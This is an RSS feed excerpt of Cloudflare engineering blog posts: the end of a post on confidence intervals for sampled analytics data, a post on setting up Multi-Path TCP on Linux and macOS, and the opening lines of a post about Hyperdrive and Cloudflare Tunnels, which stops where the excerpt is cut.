    <p>Okay, we have some downsampled data in the analytical database. It looks like the original data, but with some rows missing. How do we make sense of it? How do we know if the results can be trusted?</p><p>Let's look at the math.</p>Since the amount of sampling can vary over time and between nodes in the distributed system, we need to store this information along with the data. With each event $x_i$ we store its sample interval, which is the reciprocal to its inclusion probability $\pi_i = \frac{1}{\text{sample interval}}$. For example, if we sample 1 in every 1,000 events, each of the events included in the resulting sample will have its $\pi_i = 0.001$, so the sample interval will be 1,000. When we further downsample that batch of data, the inclusion probabilities (and the sample intervals) multiply together: a 1 in 1,000 sample from a 1 in 1,000 sample is a 1 in 1,000,000 sample of the original population. The sample interval of an event can also be interpreted roughly as the number of original events that this event represents, so in the literature it is known as weight $w_i = \frac{1}{\pi_i}$.
<p></p>
We rely on the <a href="https://en.wikipedia.org/wiki/Horvitz%E2%80%93Thompson_estimator">Horvitz-Thompson estimator</a> (HT, <a href="https://www.stat.cmu.edu/~brian/905-2008/papers/Horvitz-Thompson-1952-jasa.pdf">paper</a>) in order to derive analytics about $x_i$. It gives two estimates: the analytical estimate (e.g. the population total or size) and the estimate of the variance of that estimate. The latter enables us to figure out how accurate the results are by building <a href="https://en.wikipedia.org/wiki/Confidence_interval">confidence intervals</a>. They define ranges that cover the true value with a given probability <i>(confidence level)</i>. A typical confidence level is 0.95, at which a confidence interval (a, b) tells that you can be 95% sure the true SUM or COUNT is between a and b.
<p></p><p>So far, we know how to use the HT estimator for doing SUM, COUNT, and AVG.</p>Given a sample of size $n$, consisting of values $x_i$ and their inclusion probabilities $\pi_i$, the HT estimator for the population total (i.e. SUM) would be

$$\widehat{T}=\sum_{i=1}^n{\frac{x_i}{\pi_i}}=\sum_{i=1}^n{x_i w_i}.$$

The variance of $\widehat{T}$ is:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{\pi_{ij} - \pi_i \pi_j}{\pi_{ij} \pi_i \pi_j}},$$

where $\pi_{ij}$ is the probability of both $i$-th and $j$-th events being sampled together.
<p></p>
We use <a href="https://en.wikipedia.org/wiki/Poisson_sampling">Poisson sampling</a>, where each event is subjected to an independent <a href="https://en.wikipedia.org/wiki/Bernoulli_trial">Bernoulli trial</a> ("coin toss") which determines whether the event becomes part of the sample. Since each trial is independent, we can equate $\pi_{ij} = \pi_i \pi_j$, which when plugged in the variance estimator above turns the right-hand sum to zero:

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} + \sum_{i \neq j}^n{x_i x_j \frac{0}{\pi_{ij} \pi_i \pi_j}},$$

thus

$$\widehat{V}(\widehat{T}) = \sum_{i=1}^n{x_i^2 \frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{x_i^2 w_i (w_i-1)}.$$

For COUNT we use the same estimator, but plug in $x_i = 1$. This gives us:

$$\begin{align}
\widehat{C} &amp;= \sum_{i=1}^n{\frac{1}{\pi_i}} = \sum_{i=1}^n{w_i},\\
\widehat{V}(\widehat{C}) &amp;= \sum_{i=1}^n{\frac{1 - \pi_i}{\pi_i^2}} = \sum_{i=1}^n{w_i (w_i-1)}.
\end{align}$$

For AVG we would use

$$\begin{align}
\widehat{\mu} &amp;= \frac{\widehat{T}}{N},\\
\widehat{V}(\widehat{\mu}) &amp;= \frac{\widehat{V}(\widehat{T})}{N^2},
\end{align}$$

if we could, but the original population size $N$ is not known, it is not stored anywhere, and it is not even possible to store because of custom filtering at query time. Plugging $\widehat{C}$ instead of $N$ only partially works. It gives a valid estimator for the mean itself, but not for its variance, so the constructed confidence intervals are unusable.
<p></p>
In all cases the corresponding pair of estimates are used as the $\mu$ and $\sigma^2$ of the normal distribution (because of the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem">central limit theorem</a>), and then the bounds for the confidence interval (of confidence level ) are:

$$\Big( \mu - \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma, \quad \mu + \Phi^{-1}\big(\frac{1 + \alpha}{2}\big) \cdot \sigma\Big).$$<p>We do not know the N, but there is a workaround: simultaneous confidence intervals. Construct confidence intervals for SUM and COUNT independently, and then combine them into a confidence interval for AVG. This is known as the <a href="https://www.sciencedirect.com/topics/mathematics/bonferroni-method"><u>Bonferroni method</u></a>. It requires generating wider (half the "inconfidence") intervals for SUM and COUNT. Here is a simplified visual representation, but the actual estimator will have to take into account the possibility of the orange area going below zero.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/69Vvi2CHSW8Gew0TWHSndj/1489cfe1ff57df4e7e1ca3c31a8444a5/BLOG-2486_5.png" />
          </figure><p>In SQL, the estimators and confidence intervals look like this:</p>
            <pre><code>WITH sum(x * _sample_interval)                              AS t,
     sum(x * x * _sample_interval * (_sample_interval - 1)) AS vt,
     sum(_sample_interval)                                  AS c,
     sum(_sample_interval * (_sample_interval - 1))         AS vc,
     -- ClickHouse does not expose the erf⁻¹ function, so we precompute some magic numbers,
     -- (only for 95% confidence, will be different otherwise):
     --   1.959963984540054 = Φ⁻¹((1+0.950)/2) = √2 * erf⁻¹(0.950)
     --   2.241402727604945 = Φ⁻¹((1+0.975)/2) = √2 * erf⁻¹(0.975)
     1.959963984540054 * sqrt(vt) AS err950_t,
     1.959963984540054 * sqrt(vc) AS err950_c,
     2.241402727604945 * sqrt(vt) AS err975_t,
     2.241402727604945 * sqrt(vc) AS err975_c
SELECT t - err950_t AS lo_total,
       t            AS est_total,
       t + err950_t AS hi_total,
       c - err950_c AS lo_count,
       c            AS est_count,
       c + err950_c AS hi_count,
       (t - err975_t) / (c + err975_c) AS lo_average,
       t / c                           AS est_average,
       (t + err975_t) / (c - err975_c) AS hi_average
FROM ...</code></pre>
            <p>Construct a confidence interval for each timeslot on the timeseries, and you get a confidence band, clearly showing the accuracy of the analytics. The figure below shows an example of such a band in shading around the line.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JEnnC6P4BhM8qB8J5yKqt/3635835967085f9b24f64a5731457ddc/BLOG-2486_6.png" />
          </figure>
    <div>
      <h3>Sampling is easy to screw up</h3>
      <a href="#sampling-is-easy-to-screw-up">
        
      </a>
    </div>
    <p>We started using confidence bands on our internal dashboards, and after a while noticed something scary: a systematic error! For one particular website the "total bytes served" estimate was higher than the true control value obtained from rollups, and the confidence bands were way off. See the figure below, where the true value (blue line) is outside the yellow confidence band at all times.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CHCyKyXqPMj8DnMpBUf3N/772fb61f02b79c59417f66d9dc0b5d19/BLOG-2486_7.png" />
          </figure><p>We checked the stored data for corruption, it was fine. We checked the math in the queries, it was fine. It was only after reading through the source code for all of the systems responsible for sampling that we found a candidate for the root cause.</p><p>We used simple random sampling everywhere, basically "tossing a coin" for each event, but in Logreceiver sampling was done differently. Instead of sampling <i>randomly</i> it would perform <i>systematic sampling</i> by picking events at equal intervals starting from the first one in the batch.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4xUwjxdylG5ARlFlDtv1OC/76db68677b7ae072b0a065f59d82c6f2/BLOG-2486_8.png" />
          </figure><p>Why would that be a problem?</p>There are two reasons. The first is that we can no longer claim $\pi_{ij} = \pi_i \pi_j$, so the simplified variance estimator stops working and confidence intervals cannot be trusted. But even worse, the estimator for the total becomes biased. To understand why exactly, we wrote a short repro code in Python:
<br /><p></p>
            <pre><code>import itertools

def take_every(src, period):
    for i, x in enumerate(src):
    if i % period == 0:
        yield x

pattern = [10, 1, 1, 1, 1, 1]
sample_interval = 10 # bad if it has common factors with len(pattern)
true_mean = sum(pattern) / len(pattern)

orig = itertools.cycle(pattern)
sample_size = 10000
sample = itertools.islice(take_every(orig, sample_interval), sample_size)

sample_mean = sum(sample) / sample_size

print(f"{true_mean=} {sample_mean=}")</code></pre>
            <p>After playing with different values for <code><b>pattern</b></code> and <code><b>sample_interval</b></code> in the code above, we realized where the bias was coming from.</p><p>Imagine a person opening a huge generated HTML page with many small/cached resources, such as icons. The first response will be big, immediately followed by a burst of small responses. If the website is not visited that much, responses will tend to end up all together at the start of a batch in Logfwdr. Logreceiver does not cut batches, only concatenates them. The first response remains first, so it always gets picked and skews the estimate up.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2WZUzqCwr2A6WgX1T5UE8z/7a2e08b611fb64e64a61e3d5c792fe23/BLOG-2486_9.png" />
          </figure><p>We checked the hypothesis against the raw unsampled data that we happened to have because that particular website was also using one of the <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a> products. We took all events in a given time range, and grouped them by cutting at gaps of at least one minute. In each group, we ranked all events by time and looked at the variable of interest (response size in bytes), and put it on a scatter plot against the rank inside the group.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2IXtqGkRjV0xs3wvwx609A/81e67736cacbccdd839c2177769ee4fe/BLOG-2486_10.png" />
          </figure><p>A clear pattern! The first response is much more likely to be larger than average.</p><p>We fixed the issue by making Logreceiver shuffle the data before sampling. As we rolled out the fix, the estimation and the true value converged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4TL1pKDLw7MA6yGMSCahJN/227cb22054e0e8fe65c7766aa6e4b541/BLOG-2486_11.png" />
          </figure><p>Now, after battle testing it for a while, we are confident the HT estimator is implemented properly and we are using the correct sampling process.</p>
    <div>
      <h3>Using Cloudflare's analytics APIs to query sampled data</h3>
      <a href="#using-cloudflares-analytics-apis-to-query-sampled-data">
        
      </a>
    </div>
    <p>We already power most of our analytics datasets with sampled data. For example, the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> exposes the <a href="https://developers.cloudflare.com/analytics/analytics-engine/sql-api/#sampling"><u>sample interval</u></a> in SQL, allowing our customers to build their own dashboards with confidence bands. In the GraphQL API, all of the data nodes that have "<a href="https://developers.cloudflare.com/analytics/graphql-api/sampling/#adaptive-sampling"><u>Adaptive</u></a>" in their name are based on sampled data, and the sample interval is exposed as a field there as well, though it is not possible to build confidence intervals from that alone. We are working on exposing confidence intervals in the GraphQL API, and as an experiment have added them to the count and edgeResponseBytes (sum) fields on the httpRequestsAdaptiveGroups nodes. This is available under <code><b>confidence(level: X)</b></code>.</p><p>Here is a sample GraphQL query:</p>
            <pre><code>query HTTPRequestsWithConfidence(
  $accountTag: string
  $zoneTag: string
  $datetimeStart: string
  $datetimeEnd: string
) {
  viewer {
    zones(filter: { zoneTag: $zoneTag }) {
      httpRequestsAdaptiveGroups(
        filter: {
          datetime_geq: $datetimeStart
          datetime_leq: $datetimeEnd
      }
      limit: 100
    ) {
      confidence(level: 0.95) {
        level
        count {
          estimate
          lower
          upper
          sampleSize
        }
        sum {
          edgeResponseBytes {
            estimate
            lower
            upper
            sampleSize
          }
        }
      }
    }
  }
}
</code></pre>
            <p>The query above asks for the estimates and the 95% confidence intervals for <code><b>SUM(edgeResponseBytes)</b></code> and <code><b>COUNT</b></code>. The results will also show the sample size, which is good to know, as we rely on the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem"><u>central limit theorem</u></a> to build the confidence intervals, thus small samples don't work very well.</p><p>Here is the response from this query:</p>
            <pre><code>{
  "data": {
    "viewer": {
      "zones": [
        {
          "httpRequestsAdaptiveGroups": [
            {
              "confidence": {
                "level": 0.95,
                "count": {
                  "estimate": 96947,
                  "lower": "96874.24",
                  "upper": "97019.76",
                  "sampleSize": 96294
                },
                "sum": {
                  "edgeResponseBytes": {
                    "estimate": 495797559,
                    "lower": "495262898.54",
                    "upper": "496332219.46",
                    "sampleSize": 96294
                  }
                }
              }
            }
          ]
        }
      ]
    }
  },
  "errors": null
}
</code></pre>
            <p>The response shows the estimated count is 96947, and we are 95% confident that the true count lies in the range 96874.24 to 97019.76. Similarly, the estimate and range for the sum of response bytes are provided.</p><p>The estimates are based on a sample size of 96294 rows, which is plenty of samples to calculate good confidence intervals.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We have discussed what kept our data pipeline scalable and resilient despite doubling in size every 1.5 years, how the math works, and how it is easy to mess up. We are constantly working on better ways to keep the data pipeline, and the products based on it, useful to our customers. If you are interested in doing things like that and want to help us build a better Internet, check out our <a href="http://www.cloudflare.com/careers"><u>careers page</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[GraphQL]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Sampling]]></category>
            <guid isPermaLink="false">64DSvKdN853gq5Bx3Cyfij</guid>
            <dc:creator>Constantin Pan</dc:creator>
            <dc:creator>Jim Hawkridge</dc:creator>
        </item>
        <item>
            <title><![CDATA[Multi-Path TCP: revolutionizing connectivity, one path at a time]]></title>
            <link>https://blog.cloudflare.com/multi-path-tcp-revolutionizing-connectivity-one-path-at-a-time/</link>
            <pubDate>Fri, 03 Jan 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages, ]]></description>
            <content:encoded><![CDATA[ <p></p><p>The Internet is designed to provide multiple paths between two endpoints. Attempts to exploit multi-path opportunities are almost as old as the Internet, culminating in <a href="https://datatracker.ietf.org/doc/html/rfc2991"><u>RFCs</u></a> documenting some of the challenges. Still, today, virtually all end-to-end communication uses only one available path at a time. Why? It turns out that in multi-path setups, even the smallest differences between paths can harm the connection quality due to <a href="https://en.wikipedia.org/wiki/Equal-cost_multi-path_routing#History"><u>packet reordering</u></a> and other issues. As a result, Internet devices usually use a single path and let the routers handle the path selection.</p><p>There is another way. Enter Multi-Path TCP (MPTCP), which exploits the presence of multiple interfaces on a device, such as a mobile phone that has both Wi-Fi and cellular antennas, to achieve multi-path connectivity.</p><p>MPTCP has had a long history — see the <a href="https://en.wikipedia.org/wiki/Multipath_TCP"><u>Wikipedia article</u></a> and the <a href="https://datatracker.ietf.org/doc/html/rfc8684"><u>spec (RFC 8684)</u></a> for details. It's a major extension to the TCP protocol, and historically most of the TCP changes failed to gain traction. However, MPTCP is supposed to be mostly an operating system feature, making it easy to enable. Applications should only need minor code changes to support it.</p><p>There is a caveat, however: MPTCP is still fairly immature, and while it can use multiple paths, giving it superpowers over regular TCP, it's not always strictly better than it. Whether MPTCP should be used over TCP is really a case-by-case basis.</p><p>In this blog post we show how to set up MPTCP to find out.</p>
    <div>
      <h2>Subflows</h2>
      <a href="#subflows">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r8AP5BHbvtYEtXmYSXFwO/36e95cbac93cdecf2f5ee65945abf0b3/Screenshot_2024-12-23_at_3.07.37_PM.png" />
          </figure><p>Internally, MPTCP extends TCP by introducing "subflows". When everything is working, a single TCP connection can be backed by multiple MPTCP subflows, each using different paths. This is a big deal - a single TCP byte stream is now no longer identified by a single 5-tuple. On Linux you can see the subflows with <code>ss -M</code>, like:</p>
            <pre><code>marek$ ss -tMn dport = :443 | cat
tcp   ESTAB 0  	0 192.168.2.143%enx2800af081bee:57756 104.28.152.1:443
tcp   ESTAB 0  	0       192.168.1.149%wlp0s20f3:44719 104.28.152.1:443
mptcp ESTAB 0  	0                 192.168.2.143:57756 104.28.152.1:443</code></pre>
            <p>Here you can see a single MPTCP connection, composed of two underlying TCP flows.</p>
    <div>
      <h2>MPTCP aspirations</h2>
      <a href="#mptcp-aspirations">
        
      </a>
    </div>
    <p>Being able to separate the lifetime of a connection from the lifetime of a flow allows MPTCP to address two problems present in classical TCP: aggregation and mobility.</p><ul><li><p><b>Aggregation</b>: MPTCP can aggregate the bandwidth of many network interfaces. For example, in a data center scenario, it's common to use interface bonding. A single flow can make use of just one physical interface. MPTCP, by being able to launch many subflows, can expose greater overall bandwidth. I'm personally not convinced if this is a real problem. As we'll learn below, modern Linux has a <a href="https://dl.ifip.org/db/conf/networking/networking2016/1570234725.pdf"><u>BLESS-like MPTCP scheduler</u></a> and macOS stack has the "aggregation" mode, so aggregation should work, but I'm not sure how practical it is. However, there are <a href="https://www.openmptcprouter.com/"><u>certainly projects that are trying to do link aggregation</u></a> using MPTCP.</p></li><li><p><b>Mobility</b>: On a customer device, a TCP stream is typically broken if the underlying network interface goes away. This is not an uncommon occurrence — consider a smartphone dropping from Wi-Fi to cellular. MPTCP can fix this — it can create and destroy many subflows over the lifetime of a single connection and survive multiple network changes.</p></li></ul><p>Improving reliability for mobile clients is a big deal. While some software can use QUIC, which also works on <a href="https://www.ietf.org/archive/id/draft-ietf-quic-multipath-11.html"><u>Multipath Extensions</u></a>, a large number of classical services still use TCP. A great example is SSH: it would be very nice if you could walk around with a laptop and keep an SSH session open and switch Wi-Fi networks seamlessly, without breaking the connection.</p><p>MPTCP work was initially driven by <a href="https://uclouvain.be/fr/index.html"><u>UCLouvain in Belgium</u></a>. The first serious adoption was on the iPhone. Apparently, users have a tendency to use Siri while they are walking out of their home. It's very common to lose Wi-Fi connectivity while they are doing this. (<a href="https://youtu.be/BucQ1lfbtd4?t=533"><u>source</u></a>) </p>
    <div>
      <h2>Implementations</h2>
      <a href="#implementations">
        
      </a>
    </div>
    <p>Currently, there are only two major MPTCP implementations — Linux kernel support from v5.6, but realistically you need at least kernel v6.1 (<a href="https://oracle.github.io/kconfigs/?config=UTS_RELEASE&amp;config=MPTCP"><u>MPTCP is not supported on Android</u></a> yet) and iOS from version 7 / Mac OS X from 10.10.</p><p>Typically, Linux is used on the server side, and iOS/macOS as the client. It's possible to get Linux to work as a client-side, but it's not straightforward, as we'll learn soon. Beware — there is plenty of outdated Linux MPTCP documentation. The code has had a bumpy history and at least two different APIs were proposed. See the Linux kernel source for <a href="https://docs.kernel.org/networking/mptcp.html"><u>the mainline API</u></a> and the <a href="https://www.mptcp.dev/"><u>mptcp.dev</u></a> website.</p>
    <div>
      <h2>Linux as a server</h2>
      <a href="#linux-as-a-server">
        
      </a>
    </div>
    <p>Conceptually, the MPTCP design is pretty sensible. After the initial TCP handshake, each peer may announce additional addresses (and ports) on which it can be reached. There are two ways of doing this. First, in the handshake TCP packet each peer specifies the "<i>Do not attempt to establish new subflows to this address and port</i>" bit, also known as bit [C], in the MPTCP TCP extensions header.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/bT8oz3wxpw7alftvdYg5n/b7614a4d10b6c81e18027f6785391ede/BLOG-2637_3.png" />
          </figure><p><sup><i>Wireshark dissecting MPTCP flags from a SYN packet. </i></sup><a href="https://github.com/multipath-tcp/mptcp_net-next/issues/535"><sup><i><u>Tcpdump does not report</u></i></sup></a><sup><i> this flag yet.</i></sup></p><p>With this bit cleared, the other peer is free to assume the two-tuple is fine to be reconnected to. Typically, the <b>server allows</b> the client to reuse the server IP/port address. Usually, the <b>client is not listening</b> and disallows the server to connect back to it. There are caveats though. For example, in the context of Cloudflare, where our servers are using Anycast addressing, reconnecting to the server IP/port won't work. Going twice to the IP/port pair is unlikely to reach the same server. For us it makes sense to set this flag, disallowing clients from reconnecting to our server addresses. This can be done on Linux with:</p>
            <pre><code># Linux server sysctl - useful for ECMP or Anycast servers
$ sysctl -w net.mptcp.allow_join_initial_addr_port=0
</code></pre>
            <p>There is also a second way to advertise a listening IP/port. During the lifetime of a connection, a peer can send an ADD-ADDR MPTCP signal which advertises a listening IP/port. This can be managed on Linux by <code>ip mptcp endpoint ... signal</code>, like:</p>
            <pre><code># Linux server - extra listening address
$ ip mptcp endpoint add 192.51.100.1 dev eth0 port 4321 signal
</code></pre>
            <p>With such a config, a Linux peer (typically server) will report the additional IP/port with ADD-ADDR MPTCP signal in an ACK packet, like this:</p>
            <pre><code>host &gt; host: Flags [.], ack 1, win 8, options [mptcp 30 add-addr v1 id 1 192.51.100.1:4321 hmac 0x...,nop,nop], length 0
</code></pre>
            <p>It's important to realize that either peer can send ADD-ADDR messages. Unusual as it might sound, it's totally fine for the client to advertise extra listening addresses. The most common scenario though, consists of either nobody, or just a server, sending ADD-ADDR.</p><p>Technically, to launch an MPTCP socket on Linux, you just need to replace IPPROTO_TCP with IPPROTO_MPTCP in the application code:</p>
            <pre><code>IPPROTO_MPTCP = 262
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP)
</code></pre>
            <p>In practice, though, this introduces some changes to the sockets API. Currently not all setsockopt's work yet — like <code>TCP_USER_TIMEOUT</code>. Additionally, at this stage, MPTCP is incompatible with kTLS.</p>
    <div>
      <h2>Path manager / scheduler</h2>
      <a href="#path-manager-scheduler">
        
      </a>
    </div>
    <p>Once the peers have exchanged the address information, MPTCP is ready to kick in and perform the magic. There are two independent pieces of logic that MPTCP handles. First, given the address information, MPTCP must figure out if it should establish additional subflows. The component that decides on this is called "Path Manager". Then, another component called "scheduler" is responsible for choosing a specific subflow to transmit the data over.</p><p>Both peers have a path manager, but typically only the client uses it. A path manager has a hard task to launch enough subflows to get the benefits, but not too many subflows which could waste resources. This is where the MPTCP stacks get complicated. </p>
    <div>
      <h2>Linux as client</h2>
      <a href="#linux-as-client">
        
      </a>
    </div>
    <p>On Linux, path manager is an operating system feature, not an application feature. The in-kernel path manager requires some configuration — it must know which IP addresses and interfaces are okay to start new subflows. This is configured with <code>ip mptcp endpoint ... subflow</code>, like:</p>
            <pre><code>$ ip mptcp endpoint add dev wlp1s0 192.0.2.3 subflow  # Linux client
</code></pre>
            <p>This informs the path manager that we (typically a client) own a 192.0.2.3 IP address on interface wlp1s0, and that it's fine to use it as source of a new subflow. There are two additional flags that can be passed here: "backup" and "fullmesh". Maintaining these <code>ip mptcp endpoints</code> on a client is annoying. They need to be added and removed every time networks change. Fortunately, <a href="https://ubuntu.com/core/docs/networkmanager"><u>NetworkManager</u></a> from 1.40 supports managing these by default. If you want to customize the "backup" or "fullmesh" flags, you can do this here (see <a href="https://networkmanager.dev/docs/api/1.44.4/settings-connection.html#:~:text=mptcp-flags"><u>the documentation</u></a>):</p>
            <pre><code>ubuntu$ cat /etc/NetworkManager/conf.d/95-mptcp.conf
# set "subflow" on all managed "ip mptcp endpoints". 0x22 is the default.
[connection]
connection.mptcp-flags=0x22
</code></pre>
            <p>Path manager also takes a "limit" setting, to set a cap of additional subflows per MPTCP connection, and limit the received ADD-ADDR messages, like: </p>
            <pre><code>$ ip mptcp limits set subflow 4 add_addr_accepted 2  # Linux client
</code></pre>
            <p>I experimented with the "mobility" use case on my Ubuntu 22 Linux laptop. I repeatedly enabled and disabled Wi-Fi and Ethernet. On new kernels (v6.12), it works, and I was able to hold a reliable MPTCP connection over many interface changes. I was <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/534"><u>less lucky with the Ubuntu v6.8</u></a> kernel. Unfortunately, the <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/536"><u>default path manager on Linux</u></a> client only works when the flag "<i>Do not attempt to establish new subflows to this address and port</i>" is cleared on the server. Server-announced ADD-ADDR don't result in new subflows created, unless <code>ip mptcp endpoint</code> has a <code>fullmesh</code> flag.</p><p>It feels like the underlying MPTCP transport code works, but the path manager requires a bit more intelligence. With a new kernel, it's possible to get the "interactive" case working out of the box, but not for the ADD-ADDR case. </p>
    <div>
      <h2>Custom path manager</h2>
      <a href="#custom-path-manager">
        
      </a>
    </div>
    <p>Linux allows for two implementations of a path manager component. It can either use built-in kernel implementation (default), or userspace netlink daemon.</p>
            <pre><code>$ sysctl -w net.mptcp.pm_type=1 # use userspace path manager
</code></pre>
            <p>However, from what I found there is no serious implementation of configurable userspace path manager. The existing <a href="https://github.com/multipath-tcp/mptcpd/blob/main/plugins/path_managers/sspi.c"><u>implementations don't do much</u></a>, and the API <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/533"><u>seems</u></a> <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/532"><u>immature</u></a> yet.</p>
    <div>
      <h2>Scheduler and BPF extensions</h2>
      <a href="#scheduler-and-bpf-extensions">
        
      </a>
    </div>
    <p>Thus far we've covered Path Manager, but what about the scheduler that chooses which link to actually use? It seems that on Linux there is only one built-in "default" scheduler, and it can do basic failover on packet loss. The developers want to write <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/75"><u>MPTCP schedulers in BPF</u></a>, and this work is in-progress.</p>
    <div>
      <h2>macOS</h2>
      <a href="#macos">
        
      </a>
    </div>
    <p>As opposed to Linux, macOS and iOS expose a raw MPTCP API. On those operating systems, path manager is not handled by the kernel, but instead can be an application responsibility. The exposed low-level API is based on <code>connectx()</code>. For example, <a href="https://github.com/apple-oss-distributions/network_cmds/blob/97bfa5b71464f1286b51104ba3e60db78cd832c9/mptcp_client/mptcp_client.c#L461"><u>here's an example of obscure code</u></a> that establishes one connection with two subflows:</p>
            <pre><code>int sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);
connectx(sock, ..., &amp;cid1);
connectx(sock, ..., &amp;cid2);
</code></pre>
            <p>This powerful API is hard to use though, as it would require every application to listen for network changes. Fortunately, macOS and iOS also expose higher-level APIs. One <a href="https://github.com/mptcp-apps/mptcp-hello/blob/main/c/macOS/main.c"><u>example is nw_connection</u></a> in C, which uses nw_parameters_set_multipath_service.</p><p>Another, more common example is using <code>Network.framework</code>, and would <a href="https://gist.github.com/majek/cb54b537c74506164d2a7fa2d6601491"><u>look like this</u></a>:</p>
            <pre><code>let parameters = NWParameters.tcp
parameters.multipathServiceType = .interactive
let connection = NWConnection(host: host, port: port, using: parameters) 
</code></pre>
            <p>The API supports three MPTCP service type modes:</p><ul><li><p><i>Handover Mode</i>: Tries to minimize cellular. Uses only Wi-Fi. Uses cellular only when <a href="https://support.apple.com/en-us/102228"><u>Wi-Fi Assist</u></a> is enabled and makes such a decision.</p></li><li><p><i>Interactive Mode</i>: Used for Siri. Reduces latency. Only for low-bandwidth flows.</p></li><li><p><i>Aggregation Mode</i>: Enables resource pooling but it's only available for developer accounts and not deployable.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/47MukOs6bhCMOkO1JL15sP/7dd75417b855b681bde504122d5af01e/Screenshot_2024-12-23_at_2.59.51_PM.png" />
          </figure><p>The MPTCP API is nicely integrated with the <a href="https://support.apple.com/en-us/102228"><u>iPhone "Wi-Fi Assist" feature</u></a>. While the official documentation is lacking, it's possible to find <a href="https://youtu.be/BucQ1lfbtd4?t=533"><u>sources explaining</u></a> how it actually works. I was able to successfully test both the cleared "<i>Do not attempt to establish new subflows"</i> bit and ADD-ADDR scenarios. Hurray!</p>
    <div>
      <h2>IPv6 caveat</h2>
      <a href="#ipv6-caveat">
        
      </a>
    </div>
    <p>Sadly, MPTCP IPv6 has a caveat. Since IPv6 addresses are long, and MPTCP uses the space-constrained TCP Extensions field, there is <a href="https://github.com/multipath-tcp/mptcp_net-next/issues/448"><u>not enough room for ADD-ADDR messages</u></a> if TCP timestamps are enabled. If you want to use MPTCP and IPv6, it's something to consider.</p>
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
    <p>I find MPTCP very exciting, being one of a few deployable serious TCP extensions. However, current implementations are limited. My experimentation showed that the only practical scenario where currently MPTCP might be useful is:</p><ul><li><p>Linux as a server</p></li><li><p>macOS/iOS as a client</p></li><li><p>"interactive" use case</p></li></ul><p>With a bit of effort, Linux can be made to work as a client.</p><p>Don't get me wrong, <a href="https://netdevconf.info/0x14/pub/slides/59/mptcp-netdev0x14-final.pdf"><u>Linux developers did tremendous work</u></a> to get where we are, but, in my opinion for any serious out-of-the-box use case, we're not there yet. I'm optimistic that Linux can develop a good MPTCP client story relatively soon, and the possibility of implementing the Path manager and Scheduler in BPF is really enticing. </p><p>Time will tell if MPTCP succeeds — it's been 15 years in the making. In the meantime, <a href="https://datatracker.ietf.org/meeting/121/materials/slides-121-quic-multipath-quic-00"><u>Multi-Path QUIC</u></a> is under active development, but it's even further from being usable at this stage.</p><p>We're not quite sure if it makes sense for Cloudflare to support MPTCP. <a href="https://community.cloudflare.com/c/feedback/feature-request/30"><u>Reach out</u></a> if you have a use case in mind!</p><p><i>Shoutout to </i><a href="https://fosstodon.org/@matttbe"><i><u>Matthieu Baerts</u></i></a><i> for tremendous help with this blog post.</i></p> ]]></content:encoded>
            <category><![CDATA[TCP]]></category>
            <category><![CDATA[Network]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">6ZxrGIedGqREgTs02vpt0t</guid>
            <dc:creator>Marek Majkowski</dc:creator>
        </item>
        <item>
            <title><![CDATA[Elephants in tunnels: how Hyperdrive connects to databases inside your VPC networks]]></title>
            <link>https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/</link>
            <pubDate>Fri, 25 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Hyperdrive (Cloudflare’s globally distributed SQL connection pooler and cache) recently added support for directing database traffic from Workers across Cloudflare Tunnels. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>With September’s <a href="https://blog.cloudflare.com/builder-day-2024-announcements/#connect-to-private-databases-from-workers"><u>announcement</u></a> of Hyperdrive’s ability to send database traffic from <a href="https://workers.cloudflare.com/"><u>Workers</u></a> over <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/"><u>Cloudflare Tunnels</u></a>, we wanted to dive into the details of what it took to make this happen.</p>
    <div>
      <h2>Hyper-who?</h2>
      <a href="#hyper-who">
